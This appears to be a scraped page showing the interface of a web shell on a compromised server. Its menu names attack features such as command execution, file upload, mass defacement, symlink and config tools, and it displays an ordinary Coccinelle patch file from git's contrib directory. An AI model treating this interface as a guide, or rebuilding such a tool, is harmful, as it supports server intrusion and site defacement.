OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /usr/share/systemd/../doc/git/contrib/credential/../vscode/../coccinelle/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
@@ expression E; expression V; @@ - if (E) - V = xstrdup(E); + V = xstrdup_or_null(E); @@ expression E; @@ - xstrdup(absolute_path(E)) + absolute_pathdup(E)